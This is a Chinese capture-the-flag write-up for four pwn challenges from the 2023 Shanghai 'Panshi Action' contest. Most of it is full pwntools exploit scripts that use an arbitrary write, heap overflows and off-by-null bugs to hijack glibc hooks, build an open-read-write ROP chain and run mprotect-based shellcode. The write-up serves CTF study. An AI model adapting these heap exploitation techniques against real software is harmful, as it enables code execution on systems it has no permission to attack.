2023上海“磐石行动”pwn wp

Changeaddr
 

利用程序提供的任意地址写,控制程序执行 getflag 函数。

from pwn import *
context.log_level = 'debug'

# r = process("./ChangeAddr")  # local run
r = remote('116.236.144.37', 28526)

# The service asks where to write and then what to write; both answers are
# sent as hex text exactly as the original script did.
WRITE_PROMPT = "Now you can write one 4 byte value to memory. Where would you like to write?"
for prompt, answer in ((WRITE_PROMPT, "0804C01C"), ("?", "0804932C")):
    r.recvuntil(prompt)
    r.sendline(answer)

# After the program reports the fault, send the final input and hand the
# session over to the user.
r.recvuntil("segment fault!")
# gdb.attach(r)
r.sendline("aaaaaa4564564aaadddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddddd")
r.interactive()

Keybox

glibc 2.23 下的堆溢出。

from pwn import *
context.log_level = 'debug'

BINARY = './KeyBox'
r = process(BINARY)
elf = ELF(BINARY)
libc = elf.libc

# Two "keys" are requested before the menu appears. The first is a large
# negative literal sent in decimal (whatever str() of it produces).
first_key = str(-0x1fffffffffFFFFF4)
second_key = '1'
r.sendlineafter("Input the first key: ", first_key)
r.sendlineafter("Input the second key: ", second_key)

def show():
    """Pick menu entry 1 (show) at the next "Your choice:" prompt."""
    choice = '1'
    r.sendlineafter("Your choice:", choice)

def add(size,content):
    """Pick menu entry 2 (add): send *size* as decimal text, then *content* raw.

    The content is sent with sendafter (no trailing newline), so it reaches
    the program exactly as given.
    """
    menu_prompt = "Your choice:"
    r.sendlineafter(menu_prompt, '2')
    r.sendlineafter("Please enter the length of the item:", str(size))
    r.sendafter("Please enter the name of item:", content)
def edit(idx,size,content):
    """Pick menu entry 3 (edit): send index, new length and new content.

    Every answer, including *content*, is newline-terminated (sendlineafter).
    """
    dialogue = (
        ("Your choice:", '3'),
        ("Please enter the index of item:", str(idx)),
        ("Please enter the length of item:", str(size)),
        ("Please enter the new name of the item:", content),
    )
    for prompt, answer in dialogue:
        r.sendlineafter(prompt, answer)
def delete(idx):
    """Pick menu entry 4 (delete) for item *idx*."""
    r.sendlineafter("Your choice:", '4')
    index_text = str(idx)
    r.sendlineafter("Please enter the index of item:", index_text)



# Allocate the working set of items; trailing comments give the index each one gets.
add(0x10,'a'*0x10)  # idx 0
add(0x10,'c'*0x10)  # idx 1
add(0x20,'a')  # idx 2
add(0x68,'a')  # idx 3
add(0x20,'a')  # idx 4
add(0x68,'a')  # idx 5
add(0x68,'a')  # idx 6

# edit() accepts a length (0x30) larger than item 0's allocation (0x10): the bytes
# past the first 0x10 land in the following chunk's header (the write-up's heap overflow).
edit(0,0x30,b'a'*0x10+p64(0)+p64(0xf1))
delete(1)
add(0x10,'a')  # idx 1
show()
# Take the 6-byte pointer ending in 0x7f, zero-pad to 8, and subtract the page's fixed
# offset to __malloc_hook; the 88+0x10 adjustment is specific to the target libc build.
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-88-0x10-libc.sym['__malloc_hook']
print("libc_base------------>",hex(libc_base))
malloc_hook=libc_base+libc.sym['__malloc_hook']-0x23  # 0x23 below the hook itself
system=libc_base+libc.sym['system']  # computed but not used below
add(0xc1,'a')

delete(6)
# Second overflow, this time from item 5 (0x68) into the just-freed item 6: writes a
# 0x71 size field followed by the malloc_hook-derived address.
edit(5,0xf0,b'a'*0x68+p64(0x71)+p64(malloc_hook))
add(0x68,'/bin/sh\x00')  # idx 6
# 0x401765 is a program address taken as-is from the write-up (not resolved via elf.sym).
add(0x68,b'a'*0x13+p64(0x401765))
# One more allocation request (menu 2) — presumably to make malloc run with the hook set.
r.sendlineafter("Your choice:",'2')
r.sendlineafter("Please enter the length of the item:",str(0x20))

# gdb.attach(r)
r.interactive()

ssql

程序用堆块实现了一个数据库管理,一共有申请、释放、编辑、打印四个功能。首先创建 table,然后每个 table 可以创建多个 column;需要先逆向出这四个功能对应的语句格式,才能使用它们。

漏洞点是 edit 函数中的 strcpy 会在末尾多写一个 \x00,造成 off-by-null。

利用这个溢出的 0 字节可以改写堆块指针,同时在对应位置伪造一个 chunk,造成堆块重叠。

from pwn import *
context.log_level = 'debug'

TARGET = './pwn'
r = process(TARGET)
elf = ELF(TARGET)
libc = elf.libc

def add(idx):
    """Issue `CREATE TABLE <idx>` at the next "mysql > " prompt (sent without a newline)."""
    statement = 'CREATE TABLE {table}'.format(table=idx)
    r.sendafter("mysql > ", statement)

def delete(idx):
    """Issue `DELETE TABLE <idx>` at the next "mysql > " prompt (sent without a newline)."""
    statement = 'DELETE TABLE {table}'.format(table=idx)
    r.sendafter("mysql > ", statement)

def show(idx):
    """Issue `SHOW  TABLE <idx>` (note the double space, kept as the program expects it)."""
    statement = 'SHOW  TABLE {table}'.format(table=idx)
    r.sendafter("mysql > ", statement)



def add_c(c,idx):
    """Issue `CREATE <c> TABLE <idx>`: add column *c* to table *idx*."""
    statement = 'CREATE {column} TABLE {table}'.format(column=c, table=idx)
    r.sendafter("mysql > ", statement)

def delete_c(c,idx):
    """Issue `DELETE <c> FROM <idx>`: remove column *c* from table *idx*."""
    statement = 'DELETE {column} FROM {table}'.format(column=c, table=idx)
    r.sendafter("mysql > ", statement)

def edit_c(c,idx,name,content):
    """Issue `EDIT <c> FROM <idx>`, then answer the name and content prompts.

    Both answers go through sendafter, i.e. raw bytes with no newline appended.
    """
    statement = 'EDIT {column} FROM {table}'.format(column=c, table=idx)
    r.sendafter("mysql > ", statement)
    for prompt, answer in (("Column name:", name), ("Column Content: ", content)):
        r.sendafter(prompt, answer)

#----------------leak_heap-----------------
#----------------leak_heap-----------------
add(1)
add_c(0,1)
add_c(1,1)
delete_c(1,1)
delete_c(0,1)
add_c(0,1)  # presumably the recycled chunk still holds a heap pointer that show() prints
show(1)
r.recvuntil("Column Content: ")
# 6-byte pointer, zero-padded to 8; 0x470 is the page's offset from that chunk to the heap start.
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x470
print("heap_base------------>",hex(heap_base))


#---------------------leak_libc-----------------
for i in range(6):
    add_c(i+1,1)
# Fake chunk written through column 0 (the write-up's "伪造 chunk"): 0xc0 bytes of padding,
# then a 0x541 size field, a 0x31 size field and a pointer into the heap.
payload=b'\x00'*0xc0+p64(0)+p64(0x541)+p64(0x31)+p64(0)+p64(heap_base+0x400)
edit_c(0,1,b'a'*0x10,payload)
delete(1)
add(1)
add_c(0,1)
add_c(1,1)
show(1)
# Same 0x7f-terminated leak pattern as the heap leak; 0x10+96 is the page's
# libc-specific adjustment to reach __malloc_hook.
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x10-96-libc.sym['__malloc_hook']
print("libc_base----------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
# Hard-coded one_gadget candidates for the target libc; index 1 is the one used.
one_gadget=[0xe3afe,0xe3b01,0xe3b04]
ogg=libc_base+one_gadget[1]
add_c(2,1)
add_c(3,1)
# Rewrite the same region, now with three heap_base-relative pointers after the size fields.
edit_c(0,1,b'a'*0x10,b'b'*0xc0+p64(0)+p64(0x31)*2+p64(0)+p64(heap_base+0x540)+p64(heap_base+0x300)+p64(heap_base+0x590))
edit_c(2,1,b'a'*7,b'\x00'*0x10+p64(heap_base+0x590)+p64(0x111))
delete(1)
add(1)
add_c(0,1)
add_c(1,1)

# Place free_hook where a column's content pointer is read from (inferred from the
# following edit_c(3, ...) writing ogg), then write the gadget address through it.
edit_c(1,1,b'a'*7,p64(0)*3+p64(0x111)+p64(free_hook))
add_c(2,1)
add_c(3,1)
edit_c(3,1,b'a'*0x10,p64(ogg))
delete(1)  # the free that follows is what runs the hook
# gdb.attach(r)
r.interactive()

hp

这个题的主要难点在逆向:需要逆向出堆块申请等功能对应的语句格式,不过它跟 HTTP 协议头比较类似。

首先要调用 login 函数使 dword_5280 = 1,之后才能执行其他功能。

漏洞点在 edit 函数中,存在一个 off-by-null。

由于这个题有沙箱,因此需要用 orw 读取 flag。

思路1:先改freehook为setcontext,然后在对应堆块中写orw链并执行。

思路2:改freehook为setcontext,然后执行mprotect将heap段权限改为7,然后在对应堆块里写shellcode:开辟内存写flag,调用32位open,rw。

exp1

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'  # architecture for the pwntools helpers used later (flat, p64)

TARGET = './pwn'
r = process(TARGET)
elf = ELF(TARGET)
libc = elf.libc
def login():
    """Send the login request: a 0x20-byte username followed by a 0x01 byte, fixed password."""
    username = 'a'*0x20 + '\x01'
    request = 'POST /login HTTP/1.0 \nUsername:' + username + '\n' + 'Password:aaaa\r\n\n'
    r.sendafter("parser> ", request)
def add(cont):
    """Send a create request; Content-Length is declared as len(cont)-1, one short of the body."""
    declared_len = len(cont) - 1
    header = 'POST /create HTTP/1.0 \nContent-Length:' + str(declared_len) + '\r\n\r\n'
    r.sendafter("parser> ", header + cont)
def delete(idx):
    """Send a delete request for item *idx* with a fixed Content-Length of 1 and no body."""
    headers = 'Idx:' + str(idx) + "\n" + "Content-Length:1" + "\n"
    r.sendafter("parser> ", 'POST /delete HTTP/1.0 \n' + headers + '\r\n\r\n')
def show(idx):
    """Send a show request for item *idx* with a fixed Content-Length of 1 and no body."""
    headers = 'Idx:' + str(idx) + "\n" + "Content-Length:1" + "\n"
    r.sendafter("parser> ", 'POST /show HTTP/1.0 \n' + headers + '\r\n\r\n')
def edit(idx,cont):
    """Send an edit request for item *idx*; Content-Length is len(cont)-1, the body is *cont*."""
    declared_len = len(cont) - 1
    headers = 'Idx:' + str(idx) + '\n' + "Content-Length:" + str(declared_len) + '\r\n\r\n'
    r.sendafter("parser> ", 'POST /edit HTTP/1.0 \n' + headers + cont)

#------------leak----------------------#
login()  # required first: the write-up notes nothing else works before login
add('a'*0x440)  # idx 0
add('a'*2)  # idx 1
delete(0)
add('a'*0x18)  # idx 0 again
show(0)
# 6-byte pointer ending in 0x7f, zero-padded; 0x410+96 is the page's libc-specific
# adjustment to reach __malloc_hook.
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
r.recv(10)  # skip 10 bytes between the two leaked values
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250  # 0x250 is the page's offset to the heap start
print("heap_base----------->",hex(heap_base))
# Gadget offsets hard-coded for the target libc build (taken as-is from the write-up).
pop_rax_ret = libc_base + 0x000000000001b500
pop_rdi_ret= libc_base + 0x000000000002164f
pop_rsi_ret = libc_base + 0x0000000000023a6a
pop_rdx_ret = libc_base + 0x0000000000001b96
syscall_ret = libc_base + 0x00000000000d2625
open_=libc_base+libc.sym['open']
add('a'*0x420)  # idx 2
add('a'*0x439)  # idx 3
for i in range(3):  # idx 4, 5, 6
    add('a'*0x109)

add('a'*0x4f0)  # idx 7
add('c'*0x20)  # idx 8
# Successively shorter edits of item 6, each ending in \x01 — presumably so the edit's
# terminating NUL (the off-by-null from the write-up) lands at decreasing offsets.
edit(6,'a'*0x108+'\x01')
for i in range(8,-1,-1):
    edit(6,'a'*(0x100+i)+'\x01')
# Write the 2-byte little-endian value 0x770 (= 0x440+0x330) after 0x101 bytes of padding.
edit(6,'a'*0x101+p16(0x440+0x330).decode())
delete(3)
delete(7)
add('a'*0x400)  # idx 3
delete(4)
add('b'*0x50)  # idx 4
# Only the low 6 bytes of the pointer are written (the top two are zero anyway).
edit(4,'a'*0x31+p64(free_hook)[0:6])
add('a'*0x109)  # idx 7
add('b'*0x109)  # idx 9
# setcontext+53: offset taken from the write-up ("改 freehook 为 setcontext").
edit(9,'a'+p64(setcontext+53)[0:6])
add('b'*0x500)  # idx 10


flag_addr=heap_base+0xb40  # presumably where the leading 'flag\0' of the payload ends up
data=free_hook+0x100  # unused below
# Offsets here are relative to flat()'s output, which in the final payload follows an
# 8-byte 'flag\0\0\0\0' prefix. 0xf8 holds the chain: open(flag_addr, 0), then
# read(3, heap_base+0x200, 0x40) and write(1, heap_base+0x200, 0x40) via raw syscalls.
orw={
    0x98:{
        0x0:heap_base+0xc40,
        0x8:pop_rdi_ret+1  # presumably a bare `ret` (skips the one-byte pop)
    },
    0xf8:{
    0x0:[
            pop_rdi_ret,
            flag_addr,
            pop_rsi_ret,
            0,
            open_,
 
            pop_rax_ret,  # read(3, heap_base+0x200, 0x40): rax=0
            0,
            pop_rdi_ret,
            3,
            pop_rsi_ret,
            heap_base+0x200,
            pop_rdx_ret,
            0x40,
            syscall_ret,
 
            pop_rax_ret,  # write(1, heap_base+0x200, 0x40): rax=1
            1,
            pop_rdi_ret,
            1,
            pop_rsi_ret,
            heap_base+0x200,
            pop_rdx_ret,
            0x40,
            syscall_ret
        ]
    }

}

# NOTE(review): str + flat() only concatenates under Python 2 (flat() returns bytes on
# Python 3), and the loop below indexes payload as a str; the script is Python 2 as written.
payload='flag\x00\x00\x00\x00'+flat(orw)


# Write the payload back to front. Bytes that must be NUL are not sent directly: a shorter
# write ending just before position i leaves them to the terminator instead (inferred).
i = len(payload) - 1
while i >= 0:
    if payload[i] == '\x00':
        edit(10,'a'+ 'b' * i)
        i = i - 1
    else:
        j = i
        while payload[j] != '\x00':
            j = j - 1
        edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])
        i = j
gdb.attach(r)  # left enabled here (commented out in the other scripts on this page)
delete(10)

r.interactive()

exp2

from pwn import *
context.log_level = 'debug'
context.arch = 'amd64'  # architecture for the pwntools helpers used later (asm, SigreturnFrame)

TARGET = './pwn'
r = process(TARGET)
elf = ELF(TARGET)
libc = elf.libc
def login():
    """Send the login request: a 0x20-byte username followed by a 0x01 byte, fixed password."""
    username = 'a'*0x20 + '\x01'
    request = 'POST /login HTTP/1.0 \nUsername:' + username + '\n' + 'Password:aaaa\r\n\n'
    r.sendafter("parser> ", request)
def add(cont):
    """Send a create request; Content-Length is declared as len(cont)-1, one short of the body."""
    declared_len = len(cont) - 1
    header = 'POST /create HTTP/1.0 \nContent-Length:' + str(declared_len) + '\r\n\r\n'
    r.sendafter("parser> ", header + cont)
def delete(idx):
    """Send a delete request for item *idx* with a fixed Content-Length of 1 and no body."""
    headers = 'Idx:' + str(idx) + "\n" + "Content-Length:1" + "\n"
    r.sendafter("parser> ", 'POST /delete HTTP/1.0 \n' + headers + '\r\n\r\n')
def show(idx):
    """Send a show request for item *idx* with a fixed Content-Length of 1 and no body."""
    headers = 'Idx:' + str(idx) + "\n" + "Content-Length:1" + "\n"
    r.sendafter("parser> ", 'POST /show HTTP/1.0 \n' + headers + '\r\n\r\n')
def edit(idx,cont):
    """Send an edit request for item *idx*; Content-Length is len(cont)-1, the body is *cont*."""
    declared_len = len(cont) - 1
    headers = 'Idx:' + str(idx) + '\n' + "Content-Length:" + str(declared_len) + '\r\n\r\n'
    r.sendafter("parser> ", 'POST /edit HTTP/1.0 \n' + headers + cont)

#------------leak----------------------#
login()  # required first: the write-up notes nothing else works before login
add('a'*0x440)  # idx 0
add('a'*2)  # idx 1
delete(0)
add('a'*0x18)  # idx 0 again
show(0)
# 6-byte pointer ending in 0x7f, zero-padded; 0x410+96 is the page's libc-specific
# adjustment to reach __malloc_hook.
libc_base=u64(r.recvuntil(b'\x7f')[-6:].ljust(8,b'\x00'))-0x410-96-libc.sym['__malloc_hook']
print("libc_base------------->",hex(libc_base))
free_hook=libc_base+libc.sym['__free_hook']
setcontext=libc_base+libc.sym['setcontext']
mprotect=libc_base+libc.sym['mprotect']
r.recv(10)  # skip 10 bytes between the two leaked values
heap_base=u64(r.recv(6).ljust(8,b'\x00'))-0x250  # 0x250 is the page's offset to the heap start
print("heap_base----------->",hex(heap_base))

add('a'*0x420)  # idx 2
add('a'*0x439)  # idx 3
for i in range(3):  # idx 4, 5, 6
    add('a'*0x109)

add('a'*0x4f0)  # idx 7
add('c'*0x20)  # idx 8
# Successively shorter edits of item 6, each ending in \x01 — presumably so the edit's
# terminating NUL (the off-by-null from the write-up) lands at decreasing offsets.
edit(6,'a'*0x108+'\x01')
for i in range(8,-1,-1):
    edit(6,'a'*(0x100+i)+'\x01')
# Write the 2-byte little-endian value 0x770 (= 0x440+0x330) after 0x101 bytes of padding.
edit(6,'a'*0x101+p16(0x440+0x330).decode())
delete(3)
delete(7)
add('a'*0x400)  # idx 3
delete(4)
add('b'*0x50)  # idx 4
# Only the low 6 bytes of the pointer are written (the top two are zero anyway).
edit(4,'a'*0x31+p64(free_hook)[0:6])
add('a'*0x109)  # idx 7
add('b'*0x109)  # idx 9
# setcontext+53: offset taken from the write-up ("改 freehook 为 setcontext").
edit(9,'a'+p64(setcontext+53)[0:6])
add('b'*0x500)  # idx 10

# Register state for setcontext: continue at mprotect(heap_base, 0x1000, 7) — the
# write-up's "set the heap segment to permission 7" step — with rsp inside the heap.
frame=SigreturnFrame()
frame.rdi=heap_base
frame.rsi=0x1000
frame.rdx=0x7
frame.rip=mprotect
frame.rsp=heap_base+0xc38

# Assembled below with asm(). The int 0x80 blocks use 32-bit syscall numbers (the
# write-up's "32-bit open" approach); the trailing two blocks are 64-bit read/write.
shellcode='''
        mov rax, 192     
        mov rbx, 0x400000
        mov rcx, 0x1000
        mov rdx, 7
        mov rsi, 0x100022
        mov rdi, 0
        int 0x80

        mov rsp, 0x400108
        push 0x67616c66

        mov rax, 5       
        mov rbx, 0x400100
        mov rcx, 0
        mov rdx, 0
        int 0x80

        mov rdi, 3  
        mov rax, 0
        mov rsi, rsp
        mov rdx, 0x50
        syscall

        mov rax,1          
        mov rdi,1
        syscall

'''

# NOTE(review): str(frame) + bytes only concatenates under Python 2 (on Python 3 str(frame)
# is a text rendering, not the raw frame); the loop below also indexes payload as a str.
payload = str(frame)+p64(heap_base+0xc40)+asm(shellcode,arch='amd64')
# Write the payload back to front. Bytes that must be NUL are not sent directly: a shorter
# write ending just before position i leaves them to the terminator instead (inferred).
i = len(payload) - 1
while i >= 0:
    if payload[i] == '\x00':
        edit(10,'a'+ 'b' * i)
        i = i - 1
    else:
        j = i
        while payload[j] != '\x00':
            j = j - 1
        edit(10,'a'+ 'b' * (j + 1) + payload[j + 1: i + 1])
        i = j
gdb.attach(r)  # left enabled here (commented out in the other scripts on this page)
delete(10)
r.interactive()

执行后即可得到 flag。

 
